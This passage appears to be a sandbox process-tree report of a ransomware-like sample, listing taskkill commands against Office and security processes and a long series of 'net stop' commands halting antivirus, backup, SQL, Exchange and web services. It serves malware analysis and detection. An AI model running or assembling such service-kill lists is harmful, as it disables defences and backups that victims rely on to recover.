- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM visio.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM winword.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM wordpad.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM xfssvccon.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM tmlisten.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM PccNTMon.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM CNTAoSMgr.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM Ntrtscan.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM mbamtray.exe /F4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Acronis VSS Provider" /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Acronis VSS Provider" /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sacsvr /y6⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Enterprise Client Service" /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Enterprise Client Service" /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos Agent" /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Agent" /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos AutoUpdate Service" /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos AutoUpdate Service" /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos Clean Service" /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Clean Service" /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos Device Control Service" /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Device Control Service" /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos File Scanner Service" /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos File Scanner Service" /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos Health Service" /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Health Service" /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos MCS Client" /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos MCS Client" /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos Safestore Service" /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Safestore Service" /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos Message Router" /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Message Router" /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos MCS Agent" /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos MCS Agent" /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos System Protection Service" /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos System Protection Service" /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Sophos Web Control Service" /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sophos Web Control Service" /y5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "SQLsafe Backup Service" /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLsafe Backup Service" /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLSERVER /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Symantec System Recovery" /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec System Recovery" /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "Veeam Backup Catalog Data Service" /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service" /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop "SQLsafe Filter Service" /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLsafe Filter Service" /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ARSM /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ARSM /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop BackupExecAgentBrowser /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop BackupExecAgentAccelerator /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop Antivirus /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Antivirus /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop BackupExecDeviceMediaService /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDeviceMediaService /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop AcrSch2Svc /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop AcronisAgent /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop BackupExecJobEngine /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop BackupExecManagementService /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop bedbg /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop bedbg /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop BackupExecVSSProvider /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop BackupExecRPCService /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop EraserSvc11710 /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EraserSvc11710 /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop FA_Scheduler /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop FA_Scheduler /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop IISAdmin /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop IISAdmin /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop EsgShKernel /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EsgShKernel /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop EPUpdateService /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPUpdateService /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop EPSecurityService /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop EPSecurityService /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop DCAgent /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DCAgent /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop IMAP4Svc /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop IMAP4Svc /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLBrowser /y6⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop macmnsvc /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop macmnsvc /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MBAMService /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBAMService /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MBEndpointAgent /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MBEndpointAgent /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop McAfeeEngineService /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeEngineService /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop McAfeeFramework /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFramework /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop McShield /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McShield /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop McTaskManager /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop mfevtp /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop mfemms /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfemms /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MMS /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MMS /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop mozyprobackup /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mozyprobackup /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop McAfeeFrameworkMcAfeeFramework /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop masvc /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MsDtsServer /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSExchangeIS /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeIS /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVAdminService /y5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSExchangeMGMT /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMGMT /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSExchangeMTA /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeMTA /y5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSExchangeSA /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSA /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$BKUPEXEC /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$PRACTTICEBGC /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$SBSMONITORING /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$PROFXENGAGEMENT /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$PRACTICEMGT /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$SHAREPOINT /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$TPS /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPS /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$TPSAMA /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$TPSAMA /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop masvc /y6⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$VEEAMSQL2008R2 /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$VEEAMSQL2012 /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McTaskManager /y6⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$SYSTEM_BGC /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$SQL_2008 /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SQL_2008 /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQL$ECWDB2 /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSOLAP$TPSAMA /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSOLAP$TPS /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyServiceHelper /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SBSMONITORING /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLFDLauncher$SHAREPOINT /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLServerOLAPService /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerOLAPService /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MSSQLServerADHelper100 /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper100 /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop MySQL80 /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MySQL80 /y5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ntrtscan /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ntrtscan /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop OracleClientCache80 /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop OracleClientCache80 /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop POP3Svc /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop POP3Svc /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ReportServer /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ReportServer$SQL_2008 /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop PDVFSService /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ReportServer$TPSAMA /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$TPSAMA /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ReportServer$TPS /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$TPS /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ReportServer$SYSTEM_BGC /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop RESvc /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RESvc /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop ShMonitor /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ShMonitor /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SMTPSvc /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SMTPSvc /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SmcService /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SmcService /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop Smcinst /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Smcinst /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$BKUPEXEC /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WRSVC /y6⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfevtp /y7⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop sophossps /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophossps /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$PRACTTICEBGC /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$ECWDB2 /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$SBSMONITORING /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wbengine /y6⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$SHAREPOINT /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$SQL_2008 /y4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$SYSTEM_BGC /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$TPSAMA /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPSAMA /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$VEEAMSQL2008R2 /y4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$TPS /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPS /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$VEEAMSQL2012 /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$PROFXENGAGEMENT /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLAgent$PRACTTICEMGT /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SntpService /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SNAC /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SepMasterService /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SDRSVC /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SAVService /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SAVAdminService /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SamSs /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop sacsvr /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLSafeOLRService /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSafeOLRService /y5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLSERVERAGENT /y4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSERVERAGENT /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLTELEMETRY$ECWDB2 /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLWriter /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLWriter /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SstpSvc /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SstpSvc /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop SQLTELEMETRY /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop swi_filter /y4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_filter /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop swi_service /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_service /y5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop swi_update_64 /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update_64 /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wbengine /y5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop svcGenericHost /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop svcGenericHost /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop TmCCSF /y4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TmCCSF /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop TrueKey /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKey /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop tmlisten /y4⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop UI0Detect /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop UI0Detect /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamBackupSvc /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBackupSvc /y5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamBrokerSvc /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamBrokerSvc /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamCatalogSvc /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamCatalogSvc /y5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamTransportSvc /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamRESTSvc /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamRESTSvc /y5⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQLFDLauncher /y6⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop VeeamNFSSvc /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y5⤵
-
C:\Windows\System32\net.exe"C:\Windows\System32\net.exe" stop W3Svc /y4⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop W3Svc /y5⤵
-
